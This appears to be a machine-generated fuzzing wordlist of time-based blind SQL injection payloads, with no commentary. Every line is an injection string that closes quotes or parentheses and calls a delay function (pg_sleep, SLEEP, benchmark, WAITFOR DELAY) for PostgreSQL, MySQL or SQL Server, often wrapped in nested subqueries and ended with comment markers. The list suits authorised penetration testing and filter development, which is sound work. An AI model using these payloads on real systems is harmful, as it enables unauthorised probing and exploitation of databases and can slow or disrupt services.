 pg_sleep(10)--
' pg_sleep(10)--
" pg_sleep(10)--
 SELECT pg_sleep(10)--
' SELECT pg_sleep(10)--
" SELECT pg_sleep(10)--
 UNION SELECT pg_sleep(10)--
' UNION SELECT pg_sleep(10)--
" UNION SELECT pg_sleep(10)--
 SLEEP(5)--
' SLEEP(5)--
" SLEEP(5)--
 SELECT SLEEP(5)--
' SELECT SLEEP(5)--
" SELECT SLEEP(5)--
 UNION SELECT SLEEP(5)--
' UNION SELECT SLEEP(5)--
" UNION SELECT SLEEP(5)--
 WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
 WAITFOR DELAY "0:0:5"--
' WAITFOR DELAY "0:0:5"--
" WAITFOR DELAY "0:0:5"--
 benchmark(50000000,MD5(1))--
' benchmark(50000000,MD5(1))--
" benchmark(50000000,MD5(1))--
 pg_sleep(10)#
' pg_sleep(10)#
" pg_sleep(10)#
 SELECT pg_sleep(10)#
' SELECT pg_sleep(10)#
" SELECT pg_sleep(10)#
 UNION SELECT pg_sleep(10)#
' UNION SELECT pg_sleep(10)#
" UNION SELECT pg_sleep(10)#
 SLEEP(5)#
' SLEEP(5)#
" SLEEP(5)#
 SELECT SLEEP(5)#
' SELECT SLEEP(5)#
" SELECT SLEEP(5)#
 UNION SELECT SLEEP(5)#
' UNION SELECT SLEEP(5)#
" UNION SELECT SLEEP(5)#
 WAITFOR DELAY '0:0:5'#
' WAITFOR DELAY '0:0:5'#
" WAITFOR DELAY '0:0:5'#
 WAITFOR DELAY "0:0:5"#
' WAITFOR DELAY "0:0:5"#
" WAITFOR DELAY "0:0:5"#
 benchmark(50000000,MD5(1))#
' benchmark(50000000,MD5(1))#
" benchmark(50000000,MD5(1))#
pg_sleep(10)--
SELECT pg_sleep(10)--
UNION SELECT pg_sleep(10)--
SLEEP(5)--
SELECT SLEEP(5)--
UNION SELECT SLEEP(5)--
WAITFOR DELAY '0:0:5'--
WAITFOR DELAY "0:0:5"--
benchmark(50000000,MD5(1))--
pg_sleep(10)#
SELECT pg_sleep(10)#
UNION SELECT pg_sleep(10)#
SLEEP(5)#
SELECT SLEEP(5)#
UNION SELECT SLEEP(5)#
WAITFOR DELAY '0:0:5'#
WAITFOR DELAY "0:0:5"#
benchmark(50000000,MD5(1))#
1 or pg_sleep(10)--
1 or SELECT pg_sleep(10)--
1 or UNION SELECT pg_sleep(10)--
1 or SLEEP(5)--
1 or SELECT SLEEP(5)--
1 or UNION SELECT SLEEP(5)--
1 or WAITFOR DELAY '0:0:5'--
1 or WAITFOR DELAY "0:0:5"--
1 or benchmark(50000000,MD5(1))--
1 or pg_sleep(10)#
1 or SELECT pg_sleep(10)#
1 or UNION SELECT pg_sleep(10)#
1 or SLEEP(5)#
1 or SELECT SLEEP(5)#
1 or UNION SELECT SLEEP(5)#
1 or WAITFOR DELAY '0:0:5'#
1 or WAITFOR DELAY "0:0:5"#
1 or benchmark(50000000,MD5(1))#
 or pg_sleep(10)--
' or pg_sleep(10)--
" or pg_sleep(10)--
 or SELECT pg_sleep(10)--
' or SELECT pg_sleep(10)--
" or SELECT pg_sleep(10)--
 or UNION SELECT pg_sleep(10)--
' or UNION SELECT pg_sleep(10)--
" or UNION SELECT pg_sleep(10)--
 or SLEEP(5)--
' or SLEEP(5)--
" or SLEEP(5)--
 or SELECT SLEEP(5)--
' or SELECT SLEEP(5)--
" or SELECT SLEEP(5)--
 or UNION SELECT SLEEP(5)--
' or UNION SELECT SLEEP(5)--
" or UNION SELECT SLEEP(5)--
 or WAITFOR DELAY '0:0:5'--
' or WAITFOR DELAY '0:0:5'--
" or WAITFOR DELAY '0:0:5'--
 or WAITFOR DELAY "0:0:5"--
' or WAITFOR DELAY "0:0:5"--
" or WAITFOR DELAY "0:0:5"--
 or benchmark(50000000,MD5(1))--
' or benchmark(50000000,MD5(1))--
" or benchmark(50000000,MD5(1))--
 or pg_sleep(10)#
' or pg_sleep(10)#
" or pg_sleep(10)#
 or SELECT pg_sleep(10)#
' or SELECT pg_sleep(10)#
" or SELECT pg_sleep(10)#
 or UNION SELECT pg_sleep(10)#
' or UNION SELECT pg_sleep(10)#
" or UNION SELECT pg_sleep(10)#
 or SLEEP(5)#
' or SLEEP(5)#
" or SLEEP(5)#
 or SELECT SLEEP(5)#
' or SELECT SLEEP(5)#
" or SELECT SLEEP(5)#
 or UNION SELECT SLEEP(5)#
' or UNION SELECT SLEEP(5)#
" or UNION SELECT SLEEP(5)#
 or WAITFOR DELAY '0:0:5'#
' or WAITFOR DELAY '0:0:5'#
" or WAITFOR DELAY '0:0:5'#
 or WAITFOR DELAY "0:0:5"#
' or WAITFOR DELAY "0:0:5"#
" or WAITFOR DELAY "0:0:5"#
 or benchmark(50000000,MD5(1))#
' or benchmark(50000000,MD5(1))#
" or benchmark(50000000,MD5(1))#
 or pg_sleep(10)=
' or pg_sleep(10)='
" or pg_sleep(10)="
 or SELECT pg_sleep(10)=
' or SELECT pg_sleep(10)='
" or SELECT pg_sleep(10)="
 or UNION SELECT pg_sleep(10)=
' or UNION SELECT pg_sleep(10)='
" or UNION SELECT pg_sleep(10)="
 or SLEEP(5)=
' or SLEEP(5)='
" or SLEEP(5)="
 or SELECT SLEEP(5)=
' or SELECT SLEEP(5)='
" or SELECT SLEEP(5)="
 or UNION SELECT SLEEP(5)=
' or UNION SELECT SLEEP(5)='
" or UNION SELECT SLEEP(5)="
 or WAITFOR DELAY '0:0:5'=
' or WAITFOR DELAY '0:0:5'='
" or WAITFOR DELAY '0:0:5'="
 or WAITFOR DELAY "0:0:5"=
' or WAITFOR DELAY "0:0:5"='
" or WAITFOR DELAY "0:0:5"="
 or benchmark(50000000,MD5(1))=
' or benchmark(50000000,MD5(1))='
" or benchmark(50000000,MD5(1))="
1) or pg_sleep(10)--
1) or SELECT pg_sleep(10)--
1) or UNION SELECT pg_sleep(10)--
1) or SLEEP(5)--
1) or SELECT SLEEP(5)--
1) or UNION SELECT SLEEP(5)--
1) or WAITFOR DELAY '0:0:5'--
1) or WAITFOR DELAY "0:0:5"--
1) or benchmark(50000000,MD5(1))--
1) or pg_sleep(10)#
1) or SELECT pg_sleep(10)#
1) or UNION SELECT pg_sleep(10)#
1) or SLEEP(5)#
1) or SELECT SLEEP(5)#
1) or UNION SELECT SLEEP(5)#
1) or WAITFOR DELAY '0:0:5'#
1) or WAITFOR DELAY "0:0:5"#
1) or benchmark(50000000,MD5(1))#
) or pg_sleep(10)=
') or pg_sleep(10)='
") or pg_sleep(10)="
) or SELECT pg_sleep(10)=
') or SELECT pg_sleep(10)='
") or SELECT pg_sleep(10)="
) or UNION SELECT pg_sleep(10)=
') or UNION SELECT pg_sleep(10)='
") or UNION SELECT pg_sleep(10)="
) or SLEEP(5)=
') or SLEEP(5)='
") or SLEEP(5)="
) or SELECT SLEEP(5)=
') or SELECT SLEEP(5)='
") or SELECT SLEEP(5)="
) or UNION SELECT SLEEP(5)=
') or UNION SELECT SLEEP(5)='
") or UNION SELECT SLEEP(5)="
) or WAITFOR DELAY '0:0:5'=
') or WAITFOR DELAY '0:0:5'='
") or WAITFOR DELAY '0:0:5'="
) or WAITFOR DELAY "0:0:5"=
') or WAITFOR DELAY "0:0:5"='
") or WAITFOR DELAY "0:0:5"="
) or benchmark(50000000,MD5(1))=
') or benchmark(50000000,MD5(1))='
") or benchmark(50000000,MD5(1))="
1)) or pg_sleep(10)--
1)) or SELECT pg_sleep(10)--
1)) or UNION SELECT pg_sleep(10)--
1)) or SLEEP(5)--
1)) or SELECT SLEEP(5)--
1)) or UNION SELECT SLEEP(5)--
1)) or WAITFOR DELAY '0:0:5'--
1)) or WAITFOR DELAY "0:0:5"--
1)) or benchmark(50000000,MD5(1))--
1)) or pg_sleep(10)#
1)) or SELECT pg_sleep(10)#
1)) or UNION SELECT pg_sleep(10)#
1)) or SLEEP(5)#
1)) or SELECT SLEEP(5)#
1)) or UNION SELECT SLEEP(5)#
1)) or WAITFOR DELAY '0:0:5'#
1)) or WAITFOR DELAY "0:0:5"#
1)) or benchmark(50000000,MD5(1))#
)) or pg_sleep(10)=
')) or pg_sleep(10)='
")) or pg_sleep(10)="
)) or SELECT pg_sleep(10)=
')) or SELECT pg_sleep(10)='
")) or SELECT pg_sleep(10)="
)) or UNION SELECT pg_sleep(10)=
')) or UNION SELECT pg_sleep(10)='
")) or UNION SELECT pg_sleep(10)="
)) or SLEEP(5)=
')) or SLEEP(5)='
")) or SLEEP(5)="
)) or SELECT SLEEP(5)=
')) or SELECT SLEEP(5)='
")) or SELECT SLEEP(5)="
)) or UNION SELECT SLEEP(5)=
')) or UNION SELECT SLEEP(5)='
")) or UNION SELECT SLEEP(5)="
)) or WAITFOR DELAY '0:0:5'=
')) or WAITFOR DELAY '0:0:5'='
")) or WAITFOR DELAY '0:0:5'="
)) or WAITFOR DELAY "0:0:5"=
')) or WAITFOR DELAY "0:0:5"='
")) or WAITFOR DELAY "0:0:5"="
)) or benchmark(50000000,MD5(1))=
')) or benchmark(50000000,MD5(1))='
")) or benchmark(50000000,MD5(1))="
;pg_sleep(10)--
;SELECT pg_sleep(10)--
;UNION SELECT pg_sleep(10)--
;SLEEP(5)--
;SELECT SLEEP(5)--
;UNION SELECT SLEEP(5)--
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY "0:0:5"--
;benchmark(50000000,MD5(1))--
;pg_sleep(10)#
;SELECT pg_sleep(10)#
;UNION SELECT pg_sleep(10)#
;SLEEP(5)#
;SELECT SLEEP(5)#
;UNION SELECT SLEEP(5)#
;WAITFOR DELAY '0:0:5'#
;WAITFOR DELAY "0:0:5"#
;benchmark(50000000,MD5(1))#
);pg_sleep(10)--
);SELECT pg_sleep(10)--
);UNION SELECT pg_sleep(10)--
);SLEEP(5)--
);SELECT SLEEP(5)--
);UNION SELECT SLEEP(5)--
);WAITFOR DELAY '0:0:5'--
);WAITFOR DELAY "0:0:5"--
);benchmark(50000000,MD5(1))--
);pg_sleep(10)#
);SELECT pg_sleep(10)#
);UNION SELECT pg_sleep(10)#
);SLEEP(5)#
);SELECT SLEEP(5)#
);UNION SELECT SLEEP(5)#
);WAITFOR DELAY '0:0:5'#
);WAITFOR DELAY "0:0:5"#
);benchmark(50000000,MD5(1))#
';pg_sleep(10)--
";pg_sleep(10)--
';SELECT pg_sleep(10)--
";SELECT pg_sleep(10)--
';UNION SELECT pg_sleep(10)--
";UNION SELECT pg_sleep(10)--
';SLEEP(5)--
";SLEEP(5)--
';SELECT SLEEP(5)--
";SELECT SLEEP(5)--
';UNION SELECT SLEEP(5)--
";UNION SELECT SLEEP(5)--
';WAITFOR DELAY '0:0:5'--
";WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY "0:0:5"--
";WAITFOR DELAY "0:0:5"--
';benchmark(50000000,MD5(1))--
";benchmark(50000000,MD5(1))--
';pg_sleep(10)#
";pg_sleep(10)#
';SELECT pg_sleep(10)#
";SELECT pg_sleep(10)#
';UNION SELECT pg_sleep(10)#
";UNION SELECT pg_sleep(10)#
';SLEEP(5)#
";SLEEP(5)#
';SELECT SLEEP(5)#
";SELECT SLEEP(5)#
';UNION SELECT SLEEP(5)#
";UNION SELECT SLEEP(5)#
';WAITFOR DELAY '0:0:5'#
";WAITFOR DELAY '0:0:5'#
';WAITFOR DELAY "0:0:5"#
";WAITFOR DELAY "0:0:5"#
';benchmark(50000000,MD5(1))#
";benchmark(50000000,MD5(1))#
');pg_sleep(10)--
");pg_sleep(10)--
');SELECT pg_sleep(10)--
");SELECT pg_sleep(10)--
');UNION SELECT pg_sleep(10)--
");UNION SELECT pg_sleep(10)--
');SLEEP(5)--
");SLEEP(5)--
');SELECT SLEEP(5)--
");SELECT SLEEP(5)--
');UNION SELECT SLEEP(5)--
");UNION SELECT SLEEP(5)--
');WAITFOR DELAY '0:0:5'--
");WAITFOR DELAY '0:0:5'--
');WAITFOR DELAY "0:0:5"--
");WAITFOR DELAY "0:0:5"--
');benchmark(50000000,MD5(1))--
");benchmark(50000000,MD5(1))--
');pg_sleep(10)#
");pg_sleep(10)#
');SELECT pg_sleep(10)#
");SELECT pg_sleep(10)#
');UNION SELECT pg_sleep(10)#
");UNION SELECT pg_sleep(10)#
');SLEEP(5)#
");SLEEP(5)#
');SELECT SLEEP(5)#
");SELECT SLEEP(5)#
');UNION SELECT SLEEP(5)#
");UNION SELECT SLEEP(5)#
');WAITFOR DELAY '0:0:5'#
");WAITFOR DELAY '0:0:5'#
');WAITFOR DELAY "0:0:5"#
");WAITFOR DELAY "0:0:5"#
');benchmark(50000000,MD5(1))#
");benchmark(50000000,MD5(1))#
));pg_sleep(10)--
));SELECT pg_sleep(10)--
));UNION SELECT pg_sleep(10)--
));SLEEP(5)--
));SELECT SLEEP(5)--
));UNION SELECT SLEEP(5)--
));WAITFOR DELAY '0:0:5'--
));WAITFOR DELAY "0:0:5"--
));benchmark(50000000,MD5(1))--
));pg_sleep(10)#
));SELECT pg_sleep(10)#
));UNION SELECT pg_sleep(10)#
));SLEEP(5)#
));SELECT SLEEP(5)#
));UNION SELECT SLEEP(5)#
));WAITFOR DELAY '0:0:5'#
));WAITFOR DELAY "0:0:5"#
));benchmark(50000000,MD5(1))#
'));pg_sleep(10)--
"));pg_sleep(10)--
'));SELECT pg_sleep(10)--
"));SELECT pg_sleep(10)--
'));UNION SELECT pg_sleep(10)--
"));UNION SELECT pg_sleep(10)--
'));SLEEP(5)--
"));SLEEP(5)--
'));SELECT SLEEP(5)--
"));SELECT SLEEP(5)--
'));UNION SELECT SLEEP(5)--
"));UNION SELECT SLEEP(5)--
'));WAITFOR DELAY '0:0:5'--
"));WAITFOR DELAY '0:0:5'--
'));WAITFOR DELAY "0:0:5"--
"));WAITFOR DELAY "0:0:5"--
'));benchmark(50000000,MD5(1))--
"));benchmark(50000000,MD5(1))--
'));pg_sleep(10)#
"));pg_sleep(10)#
'));SELECT pg_sleep(10)#
"));SELECT pg_sleep(10)#
'));UNION SELECT pg_sleep(10)#
"));UNION SELECT pg_sleep(10)#
'));SLEEP(5)#
"));SLEEP(5)#
'));SELECT SLEEP(5)#
"));SELECT SLEEP(5)#
'));UNION SELECT SLEEP(5)#
"));UNION SELECT SLEEP(5)#
'));WAITFOR DELAY '0:0:5'#
"));WAITFOR DELAY '0:0:5'#
'));WAITFOR DELAY "0:0:5"#
"));WAITFOR DELAY "0:0:5"#
'));benchmark(50000000,MD5(1))#
"));benchmark(50000000,MD5(1))#
) or pg_sleep(10)--
') or pg_sleep(10)--
") or pg_sleep(10)--
) or SELECT pg_sleep(10)--
') or SELECT pg_sleep(10)--
") or SELECT pg_sleep(10)--
) or UNION SELECT pg_sleep(10)--
') or UNION SELECT pg_sleep(10)--
") or UNION SELECT pg_sleep(10)--
) or SLEEP(5)--
') or SLEEP(5)--
") or SLEEP(5)--
) or SELECT SLEEP(5)--
') or SELECT SLEEP(5)--
") or SELECT SLEEP(5)--
) or UNION SELECT SLEEP(5)--
') or UNION SELECT SLEEP(5)--
") or UNION SELECT SLEEP(5)--
) or WAITFOR DELAY '0:0:5'--
') or WAITFOR DELAY '0:0:5'--
") or WAITFOR DELAY '0:0:5'--
) or WAITFOR DELAY "0:0:5"--
') or WAITFOR DELAY "0:0:5"--
") or WAITFOR DELAY "0:0:5"--
) or benchmark(50000000,MD5(1))--
') or benchmark(50000000,MD5(1))--
") or benchmark(50000000,MD5(1))--
) or pg_sleep(10)#
') or pg_sleep(10)#
") or pg_sleep(10)#
) or SELECT pg_sleep(10)#
') or SELECT pg_sleep(10)#
") or SELECT pg_sleep(10)#
) or UNION SELECT pg_sleep(10)#
') or UNION SELECT pg_sleep(10)#
") or UNION SELECT pg_sleep(10)#
) or SLEEP(5)#
') or SLEEP(5)#
") or SLEEP(5)#
) or SELECT SLEEP(5)#
') or SELECT SLEEP(5)#
") or SELECT SLEEP(5)#
) or UNION SELECT SLEEP(5)#
') or UNION SELECT SLEEP(5)#
") or UNION SELECT SLEEP(5)#
) or WAITFOR DELAY '0:0:5'#
') or WAITFOR DELAY '0:0:5'#
") or WAITFOR DELAY '0:0:5'#
) or WAITFOR DELAY "0:0:5"#
') or WAITFOR DELAY "0:0:5"#
") or WAITFOR DELAY "0:0:5"#
) or benchmark(50000000,MD5(1))#
') or benchmark(50000000,MD5(1))#
") or benchmark(50000000,MD5(1))#
)) or pg_sleep(10)--
')) or pg_sleep(10)--
")) or pg_sleep(10)--
)) or SELECT pg_sleep(10)--
')) or SELECT pg_sleep(10)--
")) or SELECT pg_sleep(10)--
)) or UNION SELECT pg_sleep(10)--
')) or UNION SELECT pg_sleep(10)--
")) or UNION SELECT pg_sleep(10)--
)) or SLEEP(5)--
')) or SLEEP(5)--
")) or SLEEP(5)--
)) or SELECT SLEEP(5)--
')) or SELECT SLEEP(5)--
")) or SELECT SLEEP(5)--
)) or UNION SELECT SLEEP(5)--
')) or UNION SELECT SLEEP(5)--
")) or UNION SELECT SLEEP(5)--
)) or WAITFOR DELAY '0:0:5'--
')) or WAITFOR DELAY '0:0:5'--
")) or WAITFOR DELAY '0:0:5'--
)) or WAITFOR DELAY "0:0:5"--
')) or WAITFOR DELAY "0:0:5"--
")) or WAITFOR DELAY "0:0:5"--
)) or benchmark(50000000,MD5(1))--
')) or benchmark(50000000,MD5(1))--
")) or benchmark(50000000,MD5(1))--
)) or pg_sleep(10)#
')) or pg_sleep(10)#
")) or pg_sleep(10)#
)) or SELECT pg_sleep(10)#
')) or SELECT pg_sleep(10)#
")) or SELECT pg_sleep(10)#
)) or UNION SELECT pg_sleep(10)#
')) or UNION SELECT pg_sleep(10)#
")) or UNION SELECT pg_sleep(10)#
)) or SLEEP(5)#
')) or SLEEP(5)#
")) or SLEEP(5)#
)) or SELECT SLEEP(5)#
')) or SELECT SLEEP(5)#
")) or SELECT SLEEP(5)#
)) or UNION SELECT SLEEP(5)#
')) or UNION SELECT SLEEP(5)#
")) or UNION SELECT SLEEP(5)#
)) or WAITFOR DELAY '0:0:5'#
')) or WAITFOR DELAY '0:0:5'#
")) or WAITFOR DELAY '0:0:5'#
)) or WAITFOR DELAY "0:0:5"#
')) or WAITFOR DELAY "0:0:5"#
")) or WAITFOR DELAY "0:0:5"#
)) or benchmark(50000000,MD5(1))#
')) or benchmark(50000000,MD5(1))#
")) or benchmark(50000000,MD5(1))#
AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND vRxe=vRxe
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND "vRxe"="vRxe
AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND %=
AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND %=
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND %=
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND %=
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND %=
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND %=
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND %=
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND %=
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND %=
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND "%"="
AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)
AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)--
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)--
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)--
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)--
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)--
AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)#
AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)#
AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)#
AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)#
AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)#
 AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(pg_sleep(10)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND vRxe=vRxe
' AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND 'vRxe'='vRxe
" AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))bAKL) AND "vRxe"="vRxe
 AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(pg_sleep(10)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND %=
' AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND %=
